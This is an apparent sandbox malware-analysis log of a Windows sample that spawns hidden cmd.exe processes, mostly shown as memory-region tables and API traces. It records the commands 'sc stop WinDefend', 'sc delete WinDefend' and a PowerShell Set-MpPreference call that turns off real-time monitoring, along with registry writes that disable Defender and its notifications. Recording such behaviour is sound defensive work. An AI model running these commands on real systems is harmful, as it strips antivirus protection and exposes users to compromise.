Fn
Process Create process_name = C:\Windows\system32\cmd.exe, os_pid = 0x77c, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Process Create process_name = C:\Windows\system32\cmd.exe, os_pid = 0x648, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender False 1
Fn
Registry Write Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender, value_name = DisableAntiSpyware, size = 4, type = REG_DWORD_LITTLE_ENDIAN False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications False 1
Fn
Registry Write Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications, value_name = DisableNotifications, size = 4, type = REG_DWORD_LITTLE_ENDIAN False 1
Fn
Module Get Filename process_name = c:\programdata\oyvgkgw.exe, file_name_orig = C:\ProgramData\oyvGkGw.exe, size = 260 True 1
Fn
File Create filename = C:\ProgramData\FAQ, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Create Directory C:\Users\kFT6uTQW\AppData\Roaming\tarutils True 1
Fn
File Copy source_filename = C:\ProgramData\oyvGkGw.exe, destination_filename = C:\Users\kFT6uTQW\AppData\Roaming\tarutils\oyvHkHw.exe True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
System Sleep duration = 500 milliseconds (0.500 seconds) True 2
Fn
Process #15: cmd.exe
56 0
»
Information Value
ID #15
File Name c:\windows\syswow64\cmd.exe
Command Line /c sc stop WinDefend
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:40, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:28
OS Process Information
»
Information Value
PID 0x13c
Parent PID 0x62c (c:\programdata\oyvgkgw.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 530
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000070000 0x00070000 0x00071fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000080000 0x00080000 0x00080fff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x00090fff Private Memory Readable, Writable True False False -
private_0x00000000000d0000 0x000d0000 0x0010ffff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x0020ffff Private Memory Readable, Writable True False False -
locale.nls 0x00210000 0x00276fff Memory Mapped File Readable False False False -
private_0x0000000000350000 0x00350000 0x0035ffff Private Memory Readable, Writable True False False -
private_0x0000000000400000 0x00400000 0x0047ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000480000 0x00480000 0x00607fff Pagefile Backed Memory Readable True False False -
private_0x0000000000670000 0x00670000 0x0076ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000770000 0x00770000 0x008f0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000900000 0x00900000 0x01cfffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001d00000 0x01d00000 0x02042fff Pagefile Backed Memory Readable True False False -
cmd.exe 0x4a680000 0x4a6cbfff Memory Mapped File Readable, Writable, Executable True False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
winbrand.dll 0x75620000 0x75626fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0x530
56 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-06-25 14:54:40 (UTC) True 1
Fn
System Get Time type = Ticks, time = 269070 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a680000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x75fda84f True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 3
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
Environment Get Environment String - True 2
Fn
Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module Get Filename process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Environment Get Environment String name = PROMPT False 1
Fn
Environment Set Environment String name = PROMPT, value = $P$G True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Environment Get Environment String name = KEYS False 1
Fn
File Get Info filename = C:\Windows\system32, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\System32, type = file_attributes True 1
Fn
Environment Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x75fe3b92 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75fc4a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x75fda79d True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Environment Set Environment String name = COPYCMD True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCode, value = 00000005 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCodeAscii True 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
Process #16: cmd.exe
56 0
»
Information Value
ID #16
File Name c:\windows\syswow64\cmd.exe
Command Line /c sc delete WinDefend
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:40, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:28
OS Process Information
»
Information Value
PID 0x77c
Parent PID 0x62c (c:\programdata\oyvgkgw.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x DC
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x0020ffff Private Memory Readable, Writable True False False -
private_0x0000000000320000 0x00320000 0x0032ffff Private Memory Readable, Writable True False False -
private_0x0000000000340000 0x00340000 0x0043ffff Private Memory Readable, Writable True False False -
private_0x00000000005a0000 0x005a0000 0x0061ffff Private Memory Readable, Writable True False False -
private_0x0000000000780000 0x00780000 0x0087ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000880000 0x00880000 0x00a07fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000a10000 0x00a10000 0x00b90fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000ba0000 0x00ba0000 0x01f9ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001fa0000 0x01fa0000 0x022e2fff Pagefile Backed Memory Readable True False False -
cmd.exe 0x4a680000 0x4a6cbfff Memory Mapped File Readable, Writable, Executable True False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
winbrand.dll 0x75620000 0x75626fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0xdc
56 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-06-25 14:54:40 (UTC) True 1
Fn
System Get Time type = Ticks, time = 269086 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a680000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x75fda84f True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 3
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
Environment Get Environment String - True 2
Fn
Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module Get Filename process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Environment Get Environment String name = PROMPT False 1
Fn
Environment Set Environment String name = PROMPT, value = $P$G True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Environment Get Environment String name = KEYS False 1
Fn
File Get Info filename = C:\Windows\system32, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\System32, type = file_attributes True 1
Fn
Environment Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x75fe3b92 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75fc4a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x75fda79d True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Environment Set Environment String name = COPYCMD True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCode, value = 00000005 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCodeAscii True 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
Process #17: cmd.exe
55 0
»
Information Value
ID #17
File Name c:\windows\syswow64\cmd.exe
Command Line /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:40, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:28
OS Process Information
»
Information Value
PID 0x648
Parent PID 0x62c (c:\programdata\oyvgkgw.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 250
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x0000000000210000 0x00210000 0x0024ffff Private Memory Readable, Writable True False False -
private_0x00000000002c0000 0x002c0000 0x003bffff Private Memory Readable, Writable True False False -
private_0x00000000004f0000 0x004f0000 0x004fffff Private Memory Readable, Writable True False False -
private_0x00000000005b0000 0x005b0000 0x0062ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000630000 0x00630000 0x007b7fff Pagefile Backed Memory Readable True False False -
private_0x0000000000820000 0x00820000 0x0091ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000920000 0x00920000 0x00aa0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000ab0000 0x00ab0000 0x01eaffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001eb0000 0x01eb0000 0x021f2fff Pagefile Backed Memory Readable True False False -
cmd.exe 0x4a680000 0x4a6cbfff Memory Mapped File Readable, Writable, Executable True False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
winbrand.dll 0x75620000 0x75626fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0x250
55 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-06-25 14:54:40 (UTC) True 1
Fn
System Get Time type = Ticks, time = 269086 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a680000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x75fda84f True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 3
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
Environment Get Environment String - True 2
Fn
Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1
Fn
